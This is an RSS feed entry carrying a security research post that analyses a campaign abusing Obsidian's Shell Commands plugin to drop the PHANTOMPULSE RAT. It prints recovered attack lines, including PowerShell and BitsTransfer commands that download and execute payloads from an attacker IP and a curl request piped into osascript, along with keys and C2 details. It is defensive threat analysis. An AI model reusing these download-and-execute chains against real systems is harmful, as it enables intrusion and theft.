<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
    <channel>
        <title>Elastic Security Labs</title>
        <link>https://www.elastic.co/security-labs</link>
        <description>Trusted security news &amp; research from the team at Elastic.</description>
        <lastBuildDate>Mon, 13 Apr 2026 18:54:47 GMT</lastBuildDate>
        <docs>https://validator.w3.org/feed/docs/rss2.html</docs>
        <generator>https://github.com/jpmonette/feed</generator>
        
        <copyright>© 2026. elasticsearch B.V. All Rights Reserved</copyright>
        <item>
            <title><![CDATA[Phantom in the vault: Obsidian abused to deliver PhantomPulse RAT]]></title>
            <link>https://www.elastic.co/security-labs/phantom-in-the-vault</link>
            <guid>phantom-in-the-vault</guid>
            <pubDate>Tue, 14 Apr 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[Elastic Security Labs uncovers a novel social engineering campaign that abuses the popular note-taking application, Obsidian's legitimate community plugin ecosystem. The campaign, which we track as REF6598, targets individuals in the financial and cryptocurrency sectors through elaborate social engineering on LinkedIn and Telegram.]]></description>
            <content:encoded><![CDATA[<blockquote>
<p>A follow-up publication will provide a deeper technical analysis of PHANTOMPULSE itself, covering its injection engines, persistence internals, and C2 protocol in greater detail.</p>
</blockquote>
<h2>Preamble</h2>
<p>Elastic Security Labs has identified a novel social engineering campaign that abuses the popular note-taking application, <a href="https://obsidian.md/">Obsidian</a>, as an initial access vector. The campaign, which we track as REF6598, targets individuals in the financial and cryptocurrency sectors through elaborate social engineering on LinkedIn and Telegram. The threat actors abuse Obsidian's legitimate community plugin ecosystem, specifically the <a href="https://github.com/Taitava/obsidian-shellcommands">Shell Commands</a> and <a href="https://github.com/kepano/obsidian-hider">Hider</a> plugins, to silently execute code when a victim opens a shared cloud vault.</p>
<p>In the observed intrusion, Elastic Defend detected and blocked the attack at the early stage, preventing the threat actors from achieving their objectives on the victim's machine.</p>
<p>The attack chain is cross-platform, with dedicated execution paths for both Windows and macOS. On Windows, an intermediate loader decrypts and reflectively loads payloads entirely in memory using AES-256-CBC, timer queue callback execution, and multiple anti-analysis techniques. The chain culminates in the deployment of a previously undocumented RAT we are naming <strong>PHANTOMPULSE</strong>, a heavily AI-generated, full-featured backdoor with blockchain-based C2 resolution, advanced process injection via module stomping. On macOS, the attack deploys an obfuscated AppleScript dropper with a Telegram-based fallback C2 resolution mechanism.</p>
<p>This post will detail the full attack chain, from social engineering through final payload analysis, and provide detection guidance and indicators of compromise.</p>
<h2>Key takeaways</h2>
<ul>
<li>PHANTOMPULSE is a novel, AI-assisted Windows RAT featuring blockchain-based C2 resolution via Ethereum transaction data and distinct injection techniques</li>
<li>We identified a weakness in the C2 mechanism that allows for a takeover of the implants by responders</li>
<li>Obsidian was abused for initial access social engineering attack</li>
<li>Cross-platform attack chain targeting both Windows and macOS</li>
<li>The macOS payload uses a multi-stage AppleScript dropper with a Telegram dead-drop for fallback C2 resolution</li>
<li>PHANTOMPULL is a custom in-memory loader that delivers PHANTOMPULSE</li>
</ul>
<h2>Campaign overview</h2>
<p>The threat actors operate under the guise of a venture capital firm, initiating contact with targets through LinkedIn. After initial engagement, the conversation moves to a Telegram group where multiple purported partners participate, lending credibility to the interaction. The discussion centers around financial services, specifically cryptocurrency liquidity solutions, creating a plausible business context.</p>
<p>The target is asked to use <a href="https://obsidian.md/">Obsidian</a>, presented as the firm's &quot;management database&quot;, for accessing a shared dashboard. The target is provided credentials to connect to a cloud-hosted vault controlled by the attacker.</p>
<p>This vault is the initial access vector. Once opened in Obsidian, the target is instructed to enable community plugins sync. After that, the trojanized plugins silently execute the attack chain.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image16.png" alt="Execution chain diagram" title="Execution chain diagram" /></p>
<h2>Initial access</h2>
<p>An Elastic Defend behavior alert triggered on suspicious PowerShell execution with Obsidian as the parent process. This immediately caught our attention. Initially, we suspected an untrusted binary masquerading as Obsidian. However, after inspecting the parent process code signature and hash, it appeared to be the legitimate Obsidian binary.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image38.png" alt="Process visualization with Elastic XDR" title="Process visualization with Elastic XDR" /></p>
<p>Pivoting on the process event call stack to determine whether a third-party DLL sideload or unbacked memory region was involved, we confirmed that the process creation originated directly from Obsidian itself.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image30.png" alt="Elastic alert document showcasing the call stack" title="Elastic alert document showcasing the call stack" /></p>
<p>We then investigated the surrounding files for signs of JavaScript injection via modification of dependency files or malicious .asar file planting. Everything appeared to be a clean, legitimate Obsidian installation with no third-party code. At that point, we decided to install Obsidian ourselves and explore what options an attacker could abuse to achieve command execution.</p>
<p>The first thing that stood out was the ability to log in to an Obsidian-synced vault with an email and password.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image14.png" alt="Obsidian menu to open a remote vault" title="Obsidian menu to open a remote vault" /></p>
<p>Obsidian's vault sync feature allows notes and files to be synchronized across devices and platforms. While reviewing the files of the malicious remote vault under the .obsidian config folder, we found evidence that the Shell Commands community plugin had been installed:</p>
<pre><code class="language-plaintext">C:\Users\user\Documents\&lt;redacted_vault_name&gt;\.obsidian\plugins\obsidian-shellcommands\data.json
</code></pre>
<p>The <a href="https://publish.obsidian.md/shellcommands/Index">Shell Commands plugin</a> allows users to execute platform-specific shell commands based on configurable triggers such as Obsidian startup, close, every N seconds, and others.</p>
<p>The contents of data.json confirmed our theory: the configured commands matched exactly what we had observed in the original PowerShell behavior alert.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image36.png" alt="Data.json content of the shell plugin" title="Data.json content of the shell plugin" /></p>
<p>To validate the full attack chain, we attempted to replicate the behavior end-to-end across two machines, a host and a VM using a paid Obsidian Sync license. On the host, we installed the Shell Commands community plugin with a custom command configured to spawn <code>notepad.exe</code> on startup. On the VM, we logged in to the same Obsidian account and connected to the remote vault.</p>
<p>The synced vault on the VM received the base configuration files (<code>app.json</code>, <code>appearance.json</code>, <code>core-plugins.json</code>, <code>workspace.json</code>), but notably the <code>plugins/</code> directory and <code>community-plugins.json</code> were absent entirely. This is because Obsidian's Sync settings expose two separate toggles &quot;Active community plugin list&quot; and &quot;Installed community plugins&quot; both of which are disabled by default and are local client-side preferences that do not propagate through sync.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image37.png" alt="Obsidian settings" title="Obsidian settings" /></p>
<p>As shown below, the plugins and community_plugins manifest are not synced automatically (any file inside the .obsidian directory).</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image2.png" alt=".obsidian folder content" title=".obsidian folder content" /></p>
<p>However, once enabled, the Shell Commands plugin immediately triggers execution of attacker-defined commands on vault open:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image20.png" alt="Process tree" title="Process tree" /></p>
<p>This means an attacker cannot remotely force the installation or enablement of a community plugin via vault sync alone. The victim must manually enable the community plugin sync on their device before the weaponized plugin configuration pulls down and triggers execution.</p>
<p>In the case we investigated, the attacker provided Obsidian account credentials directly to the victim as part of a social engineering lure, likely instructing them to log in, enable community plugin sync, and connect to the pre-staged vault. Once those steps were completed, the Shell Commands plugin and its data.json configuration synced automatically, and on the next configured trigger, the payload executed without any further interaction.</p>
<p>While this attack requires social engineering to cross the community plugin sync boundary, the technique remains notable: it abuses a legitimate application feature as a persistence and command execution channel, the payload lives entirely within JSON configuration files that are unlikely to trigger traditional AV signatures, and execution is handed off by a signed, trusted Electron application, making parent-process-based detection the critical layer.</p>
<p>Alongside the Shell Commands plugin, the author used <a href="https://github.com/kepano/obsidian-hider">Hider</a> (v1.6.1), a UI-cleanup plugin that hides interface elements. With every concealment option enabled, the following is the configuration:</p>
<pre><code class="language-yaml">{
  &quot;hideStatus&quot;: true,
  &quot;hideTabs&quot;: true,
  &quot;hideScroll&quot;: true,
  &quot;hideSidebarButtons&quot;: true,
  &quot;hideTooltips&quot;: true,
  &quot;hideFileNavButtons&quot;: true,
}
</code></pre>
<h3>Windows execution chain</h3>
<h4>Stage 1</h4>
<p>The Shell Commands plugin's Windows command contained two <code>Invoke-Expression</code> calls with Base64-encoded strings that decode to the following:</p>
<pre><code class="language-Powershell">iwr http://195.3.222[.]251/script1.ps1 -OutFile env:TEMP\tt.ps1 -UseBasicParsing powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -File &quot;env:TEMP\tt.ps1&quot;
</code></pre>
<p>This will download a second-stage PowerShell script from a hardcoded IP address and execute it.</p>
<h4>Stage 2</h4>
<p>The downloaded PowerShell script (<code>script1.ps1</code>) implements a loader-delivery mechanism with a built-in operator-notification system. The script uses <code>BitsTransfer</code> to download the next-stage binary and reports its progress to the C2.</p>
<pre><code class="language-Powershell">Import-Module BitsTransfer
Start-BitsTransfer -Source 'http://195.3.222[.]251/syncobs.exe?q=%23OBSIDIAN' `
  -Destination &quot;$env:TEMP\syncobs.exe&quot;
</code></pre>
<p>After the download, the script verifies the file's existence and reports the outcome to the C2 at <code>195.3.222[.]251/stuk-phase</code>. It appears that the prepended characters (<code>G</code>, <code>R</code>) to the Status Message, declaring <code>G</code>REEN or <code>R</code>ED as a status color code. The following is a table of all the status messages:</p>
<table>
<thead>
<tr>
<th align="center">Status Message</th>
<th align="center">Meaning</th>
</tr>
</thead>
<tbody>
<tr>
<td align="center"><code>GFILE FOUND ON PC</code></td>
<td align="center">Binary downloaded successfully</td>
</tr>
<tr>
<td align="center"><code>RDOWNLOAD ERROR</code></td>
<td align="center">Download failed, retrying</td>
</tr>
<tr>
<td align="center"><code>RFATAL DOWNLOAD ERROR</code></td>
<td align="center">Download failed after retry</td>
</tr>
<tr>
<td align="center"><code>GLAUNCH SUCCESS</code></td>
<td align="center">Binary executed and child processes detected</td>
</tr>
<tr>
<td align="center"><code>RLAUNCH FAILED</code></td>
<td align="center">Binary failed to start within the timeout</td>
</tr>
<tr>
<td align="center"><code>GSESSION CLOSED</code></td>
<td align="center">Execution sequence completed</td>
</tr>
</tbody>
</table>
<p>The <code>tag</code> parameter (<code>Obsidian</code>) sent with each status update identifies the campaign or infection vector, suggesting the operators might be running multiple concurrent campaigns.</p>
<pre><code class="language-c">if ($started) {
    Invoke-RestMethod -Uri &quot;http://195.3.222[.]251/stuk-phase&quot; -Method Post -Body @{ message = &quot;GLAUNCH SUCCESS&quot;; tag = $tag }
} else {
    Invoke-RestMethod -Uri &quot;http://195.3.222[.]251/stuk-phase&quot; -Method Post -Body @{ message = &quot;RLAUNCH FAILED&quot;; tag = $tag }
}
Start-Sleep -Seconds 3

Invoke-RestMethod -Uri &quot;http://195.3.222[.]251/stuk-phase&quot; -Method Post -Body @{ message = &quot;GSESSION CLOSED&quot;; tag = $tag }
</code></pre>
<h4>Loader - PHANTOMPULL</h4>
<p>This loader is a 64-bit Windows PE executable that extracts an AES-256-CBC-encrypted PE payload from its own resources, decrypts it, and reflectively loads it into memory. This in-memory payload then downloads the next stage from the domain (<code>panel.fefea22134[.]net</code>) over HTTPS.</p>
<p>The third-stage payload (PHANTOMPULSE) is then decrypted and loaded reflectively via <code>DllRegisterServer</code>. This loader, which we are calling PHANTOMPULL, includes runtime API resolution and timer-queue-based execution. This sample includes minor forms of evasion/obfuscation, along with dead code; these techniques are used as an anti-analysis trick to waste the analyst's time investigating the malware.</p>
<h3>Execution Flow</h3>
<h4>Stage 1</h4>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image25.png" alt="Execution flow via Stage 1" title="Execution flow via Stage 1" /></p>
<h4>Stage 2</h4>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image29.png" alt="Execution flow via Stage 2" title="Execution flow via Stage 2" /></p>
<h3>Fake Integrity Check</h3>
<p>The loader begins with a strange start using a dead-code guard that compares <code>GetTickCount()</code> against the hex value (<code>0xFFFFFFFE</code>) — a value that corresponds to approximately 49.7 days of continuous system uptime, making the condition virtually unreachable. The guarded block contains convincing but unreachable anti-tamper functions designed to waste analysts' time during reverse engineering.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image23.png" alt="Fake Integrity check" title="Fake Integrity check" /></p>
<p>The  <code>anti_tamper_integrity_checksum()</code> function is also pretty strange; it doesn’t actually hash any of the underlying bytes, but sums all the function addresses in the binary. The checksum is never compared to anything; this is likely an intended anti-analysis technique to waste analyst time and bloat the binary.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image1.png" alt="Integrity check summing up the function addresses" title="Integrity check summing up the function addresses" /></p>
<h3>API Hashing</h3>
<p>This loader resolves API functions dynamically at runtime using the <code>djb2</code> hashing algorithm with seed <code>0x4E67C6A7</code>. The following APIs were resolved:</p>
<ul>
<li><code>VirtualAlloc</code></li>
<li><code>VirtualProtect</code></li>
<li><code>VirtualFree</code></li>
<li><code>LoadLibraryA</code></li>
<li><code>GetProcessAddress</code></li>
</ul>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image40.png" alt="Resolving API addresses" title="Resolving API addresses" /></p>
<h3>Resource Extraction + Decryption</h3>
<p>PHANTOMPULL stores its encrypted in-memory payload inside its own resources.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image42.png" alt="RCDATA 101 via Resource Hacker" title="RCDATA 101 via Resource Hacker" /></p>
<p>In order to extract the bytes, it uses <code>FindResourceA,</code> locating the resource type (<code>RT_RCDATA</code>) under ID (<code>101</code>). The resource is mapped into memory and copied into a region marked with <code>PAGE_READWRITE</code> permissions.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image33.png" alt="Resource Extraction" title="Resource Extraction" /></p>
<p>Next, the loader performs AES-256-CBC decryption using <code>BCryptOpenAlgorithmProvider</code>. The key is hardcoded in the <code>.rdata</code> section</p>
<p><strong>Key:</strong>  <code>6a85736b64761a8b2aaeadc1c0087e1897d16cc5a9d49c6a6ea1164233bad206</code></p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image27.png" alt="Embedded AES-256-CBC key" title="Embedded AES-256-CBC key" /></p>
<p>The IV is also hard-coded on the stack: <code>A6FA4ADFC20E8E6B77E2DD631DC8FF18</code><br />
<img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image7.png" alt="Bcrypt Crypto Details" title="Bcrypt Crypto Details" /></p>
<p>After decryption, the loader validates the output is a valid PE by checking the MZ header magic value with a comparison instruction using a hard-coded value (<code>0x0C1DF</code>) that gets XOR’d with (<code>0x9B92</code>), equaling the PE magic header (0x5a4d). This is an example of some of the lightweight obfuscation efforts that often seem awkward and don't fit in.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image4.png" alt="Magic Header XOR calculation" title="Magic Header XOR calculation" /></p>
<h3>Execution</h3>
<p>Rather than calling the payload directly (which is easily detected by sandboxes), the loader uses a timer queue callback. The 50ms delay and separate-thread execution can evade various security/sandbox tooling.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image9.png" alt="CreateTimerQueue functionality" title="CreateTimerQueue functionality" /></p>
<p>Inside the callback is the reflective PE-loading functionality, which is then used to execute the next stage.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image11.png" alt="Timer callback calling reflective PE loader" title="Timer callback calling reflective PE loader" /></p>
<p>This reflective loading function is the core execution component. It copies the PE headers, maps each section into memory, applies base relocations, resolves imports, and sets the final section protections — producing a fully functional, memory-resident PE that never touches disk.</p>
<p>Execution is then transferred to the second stage via an indirect <code>call rbp</code> instruction, where RBP holds the computed entry point address of the reflectively loaded PE.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image26.png" alt="Indirect call to second stage" title="Indirect call to second stage" /></p>
<h3>Second Stage</h3>
<p>The second stage is responsible for downloading the remotely hosted payload (PHANTOMPULSE) and for using a similar reflective-loading technique to launch the implant. This stage starts by creating a mutex from an XOR operation with two hard-coded global variables.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image6.png" alt="Mutex generation via XOR" title="Mutex generation via XOR" /></p>
<p>The mutex name for this sample is: <code>hVNBUORXNiFLhYYh</code></p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image28.png" alt="Observed Mutex" title="Observed Mutex" /></p>
<p>After the mutex is created, this code enters a persistent loop that attempts to download the payload from the C2 server. If the download successfully returns a valid buffer, it breaks out and proceeds to the reflective loading stage.</p>
<p>On failure, the code employs an exponential backoff — starting with a 5-second sleep and multiplying by 1.5x on each retry, capping just under 5 minutes. This avoids a fixed beacon interval that would be trivially fingerprinted in network traffic.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image22.png" alt="Download and timeout functionality" title="Download and timeout functionality" /></p>
<p>The downloader functionality starts by decrypting the C2 and URL.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image35.png" alt="C2 and URL decryption functions" title="C2 and URL decryption functions" /></p>
<p>The C2 and URL are both decrypted using a simple string decryption function using a 16-byte rotating key (<code>f77c8e40dfc17be5e74d8679d5b35341</code>).</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image5.png" alt="XOR String decryption function" title="XOR String decryption function" /></p>
<p>Next, the malware builds the HTTPS request, appending the string using the URI <code>/v1/updates/check?build=payloads</code> and setting the User Agent (<code>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36</code>). This loader uses the WinHTTP library to connect to the C2 on port <code>443</code>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image34.png" alt="WinHTTP functionality used to download PHANTOMPULSE" title="WinHTTP functionality used to download PHANTOMPULSE" /></p>
<p>The malware takes the buffer from the remote C2 URL and decrypts the payload with a 16-byte XOR key (<code>dcf5a9b27cbeedb769ccc8635d204af9</code>)</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image19.png" alt="Payload Decryption via XOR" title="Payload Decryption via XOR" /></p>
<p>Below are the first bytes of the XOR-encoded payload:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image24.png" alt="Payload bytes before the XOR" title="Payload bytes before the XOR" /></p>
<p>Below are the first bytes after the XOR takes place:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image3.png" alt="Payload bytes after the XOR" title="Payload bytes after the XOR" /></p>
<p>After the download and XOR operations, PHANTOMPULL parses the payload and reflects the DLL using <code>DLLRegisterServer</code>.</p>
<p>By quickly checking the strings, we can see the main backdoor, PHANTOMPULSE:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image18.png" alt="PHANTONPULSE Implant strings" title="PHANTONPULSE Implant strings" /></p>
<h3>RAT - PHANTOMPULSE</h3>
<p>PHANTOMPULSE is a sophisticated 64-bit Windows RAT designed for stealth, resilience, and comprehensive remote access. The binary exhibits strong indicators of AI-assisted development: Debug strings throughout the code are abnormally verbose, self-documenting, and follow a structured step-numbering pattern (<code>[STEP 1]</code>, <code>[STEP 1/3]</code>, <code>[STEP 2/3]</code>)</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image13.png" alt="PHANTOMPULSE implant or strings view" title="PHANTOMPULSE implant or strings view" /></p>
<p>During our research, we discovered that the C2 infrastructure had a publicly exposed panel branded as <code>“Phantom Panel&quot;</code>, featuring a login page with username, password, and captcha fields. The panel's design and structure suggest it was also AI-generated, consistent with the development patterns observed in the RAT itself.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image15.png" alt="Malware panel" title="Malware panel" /></p>
<h4>C2 rotation through blockchain</h4>
<p>PHANTOMPULSE implements a decentralized C2 resolution mechanism using public blockchain infrastructure as a dead drop. The malware's primary method for obtaining its C2 URL is by resolving it from on-chain transaction data. A hardcoded C2 URL serves as a fallback if the blockchain resolution fails after repeated attempts.</p>
<p>The malware queries the Etherscan-compatible API (<code>/api?module=account&amp;action=txlist&amp;address=&lt;wallet&gt;&amp;page=1&amp;offset=1&amp;sort=desc</code>) on three Blockscout instances:</p>
<ul>
<li><code>eth.blockscout[.]com</code> (Ethereum L1)</li>
<li><code>base.blockscout[.]com</code> (Base L2)</li>
<li><code>optimism.blockscout[.]com</code> (Optimism L2)</li>
</ul>
<p>Each request fetches the most recent transaction associated with a hardcoded wallet address (<code>0xc117688c530b660e15085bF3A2B664117d8672aA</code>), which is itself XOR-encrypted in the binary. The malware parses the transaction's <code>input</code> data field from the JSON response, strips the <code>0x</code> prefix, hex-decodes the raw bytes, and XOR-decrypts the result using the wallet address as the XOR key. If the decrypted output begins with <code>http</code>, it is accepted as the new active C2 URL.</p>
<p>This technique provides the operator with an infrastructure-agnostic rotation capability: publishing a new C2 endpoint requires only submitting a transaction with crafted calldata to the wallet on any of the three monitored chains. Because blockchain transactions are immutable and publicly accessible, the malware can always locate its C2 without relying on centralized infrastructure. The use of three independent chains adds redundancy: even if one chain's explorer is blocked or unavailable, the remaining two provide alternative resolution paths.</p>
<p>However, this design introduces a significant weakness. The Blockscout API returns all transactions involving the wallet address, both sent and received, sorted in reverse chronological order. The malware does not verify the sender of the transaction. This means any third party who knows the wallet address and the XOR key (both recoverable from the binary) can craft a transaction to the wallet containing a competing input payload. Because the malware always selects the most recent transaction, a single inbound transaction with a more recent timestamp would override the operator's intended C2 URL. In practice, this allows anyone to hijack the C2 resolution by submitting a sinkhole URL encoded with the same XOR scheme, effectively redirecting all infected hosts away from the attacker infrastructure.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image21.png" alt="Wallet transaction example" title="Wallet transaction example" /></p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image41.png" alt="Xor decrypting the raw input" title="Xor decrypting the raw input" /></p>
<h4>C2 communication</h4>
<p>PHANTOMPULSE uses WinHTTP for C2 communication, dynamically loading <code>winhttp.dll</code> and resolving all required functions at runtime. The C2 infrastructure is built around five API endpoints:</p>
<table>
<thead>
<tr>
<th>Endpoint</th>
<th>Method</th>
<th>Purpose</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>/v1/telemetry/report</code></td>
<td>POST</td>
<td>Heartbeat with system telemetry</td>
</tr>
<tr>
<td><code>/v1/telemetry/tasks/&lt;id&gt;</code></td>
<td>GET</td>
<td>Command fetch</td>
</tr>
<tr>
<td><code>/v1/telemetry/upload/</code></td>
<td>POST</td>
<td>Screenshot/file upload</td>
</tr>
<tr>
<td><code>/v1/telemetry/result</code></td>
<td>POST</td>
<td>Command result delivery</td>
</tr>
<tr>
<td><code>/v1/telemetry/keylog/</code></td>
<td>POST</td>
<td>Keylog data upload</td>
</tr>
</tbody>
</table>
<p>The heartbeat sends comprehensive system telemetry as JSON, including CPU model, GPU, RAM, OS version, username, privilege level, public IP, installed AV products, installed applications, and the results of the last command execution.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image31.png" alt="System information collection" title="System information collection" /></p>
<h4>Command table</h4>
<p>The command dispatcher parses JSON responses from the C2 to extract and hash commands via the <code>djb2</code> algorithm. This hash is processed by a switch-case statement to execute the corresponding logic, as seen in the pseudocode below:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image32.png" alt="Pseudocode command dispatcher" title="Pseudocode command dispatcher" /></p>
<table>
<thead>
<tr>
<th>Hash</th>
<th>Command</th>
<th>Action</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>0x04CF1142</code></td>
<td><code>inject</code></td>
<td>Inject shellcode/DLL/EXE into target process</td>
</tr>
<tr>
<td><code>0x7C95D91A</code></td>
<td><code>drop</code></td>
<td>Drop the file to the disk and execute</td>
</tr>
<tr>
<td><code>0x9A37F083</code></td>
<td><code>screenshot</code></td>
<td>Capture and upload a screenshot</td>
</tr>
<tr>
<td><code>0x08DEDEF0</code></td>
<td><code>keylog</code></td>
<td>Start/stop keylogger</td>
</tr>
<tr>
<td><code>0x4EE251FF</code></td>
<td><code>uninstall</code></td>
<td>Full persistence removal and cleanup</td>
</tr>
<tr>
<td><code>0x65CCC50B</code></td>
<td><code>elevate</code></td>
<td>Escalate to SYSTEM via COM elevation moniker</td>
</tr>
<tr>
<td><code>0xB3B5B880</code></td>
<td><code>downgrade</code></td>
<td>SYSTEM -&gt; elevated admin transition</td>
</tr>
<tr>
<td><code>0x20CE3BC8</code></td>
<td><code>&lt;unresolved&gt;</code></td>
<td>Resolves APIs, calls ExitProcess(0) self-termination</td>
</tr>
</tbody>
</table>
<h3>MacOS execution chain</h3>
<h4>Stage 1: AppleScript via osascript</h4>
<p>The Shell commands plugin's macOS command executes a Base64-encoded payload through <code>osascript</code>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image10.png" alt="MacOS stage 1 payload" title="MacOS stage 1 payload" /></p>
<p>The decoded payload performs two primary actions:</p>
<p><strong>LaunchAgent persistence</strong>: Creates a persistent LaunchAgent plist at <code>~/Library/LaunchAgents/com.vfrfeufhtjpwgray.plist</code> configured with <code>KeepAlive</code> and <code>RunAtLoad</code> set to <code>true</code>, ensuring the second-stage payload executes on every login and restarts if terminated.</p>
<p><strong>Second-stage execution</strong>: The LaunchAgent executes a heavily obfuscated AppleScript dropper through <code>/bin/bash -c</code> piped into <code>osascript</code>.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image12.png" alt="MacOS stage 1 payload decoded" title="MacOS stage 1 payload decoded" /></p>
<h4>Stage 2: Obfuscated AppleScript dropper</h4>
<p>The second-stage payload is an obfuscated AppleScript dropper that employs multiple evasion techniques.</p>
<p><strong>String obfuscation</strong>: All sensitive strings (domains, URLs, user-agent values) are constructed at runtime using <code>ASCII character</code>, <code>character id</code>, and <code>string id</code> calls, preventing static string extraction:</p>
<pre><code>property __tOlA5QTO5I : {(string id {48, 120, 54, 54, 54, 46, 105, 110, 102, 111})}
-- Decodes to: &quot;0x666.info&quot;
</code></pre>
<p><strong>Decoy variables</strong>: Numerous unused variables with random names and values are defined to increase entropy and hinder analysis.</p>
<p><strong>Fragmented concatenation</strong>: Strings are split across mixed encoding methods, combining literal fragments with character-ID lookups to defeat pattern matching.</p>
<h4>C2 resolution with Telegram fallback</h4>
<p>The dropper implements a layered C2 resolution strategy:</p>
<ol>
<li><strong>Primary</strong>: Iterates over a hardcoded domain list (including <code>0x666[.]info</code>), sending a POST request with body <code>&quot;check&quot;</code> to validate C2 availability</li>
<li><strong>Fallback</strong>: If the primary domain is unreachable, scrapes a public Telegram channel (<code>t[.]me/ax03bot</code>) to extract a backup domain<br />
<img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image8.png" alt="Backup Domain" title="Backup Domain" /></li>
</ol>
<p>This Telegram dead-drop technique allows operators to rotate C2 infrastructure, making domain-based blocking insufficient as a sole mitigation.</p>
<h4>Payload retrieval</h4>
<p>Once a C2 is resolved, the script downloads and pipes a second-stage payload directly into <code>osascript</code>:</p>
<pre><code>curl -s --connect-timeout 5 --max-time 10 --retry 3 --retry-delay 2 -X POST &lt;C2_URL&gt; \
  -H &quot;User-Agent: &lt;spoofed Chrome UA&gt;&quot;-d &quot;txid=346272f0582541ae5dd08429bb4dc4ff&amp;bmodule&quot;| osascript
</code></pre>
<p>The victim identifier (<code>txid</code>) and module selector (<code>bmodule</code>) are sent as POST parameters. The response is expected to be another AppleScript payload executed immediately. At the time of analysis, the C2 servers for the macOS chain were offline, preventing the collection of subsequent stages.</p>
<h3>Infrastructure analysis</h3>
<h4>Wallet activity</h4>
<p>Examining the on-chain activity for the hardcoded wallet (<code>0xc117688c530b660e15085bF3A2B664117d8672aA</code>) reveals the operator's C2 rotation history. The two most recent transactions are self-transfers (wallet to itself), each encoding a different C2 URL in the transaction input data:</p>
<table>
<thead>
<tr>
<th>Date (UTC)</th>
<th>Decoded C2 URL</th>
</tr>
</thead>
<tbody>
<tr>
<td><code>Feb 19, 2026 12:29:47</code></td>
<td><code>https://panel.fefea22134[.]net</code></td>
</tr>
<tr>
<td><code>Feb 12, 2026 22:01:59</code></td>
<td><code>https://thoroughly-publisher-troy-clara[.]trycloudflare[.]com</code></td>
</tr>
</tbody>
</table>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image17.png" alt="Transaction history" title="Transaction history" /></p>
<p>The use of a Cloudflare Tunnel domain (<code>trycloudflare[.]com</code>) as a prior C2 endpoint is notable, as it allows the operator to expose a local server through Cloudflare's infrastructure without registering a domain, providing an additional layer of anonymity.</p>
<p>The wallet was initially funded on Feb 12, 2026, at 21:39:47 UTC by a separate account (<code>0x38796B8479fDAE0A72e5E7e326c87a637D0Cbc0E</code>) with a transfer of $5.84 and an empty input field (<code>0x</code>), confirming this was purely a funding transaction. The funding wallet itself has conducted approximately 50 transactions over the past three months, which provides a potential pivot point for uncovering additional campaigns operated by the same threat actor.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/phantom-in-the-vault/image39.png" alt="Funding wallet transactions" title="Funding wallet transactions" /></p>
<h4>Payload staging server</h4>
<p>The initial payload delivery server at <code>195.3.222[.]251</code> is hosted on <strong>AS 201814 (MEVSPACE sp. z o.o.)</strong>, a Polish hosting provider.</p>
<h4>PhantomPulse C2 panel</h4>
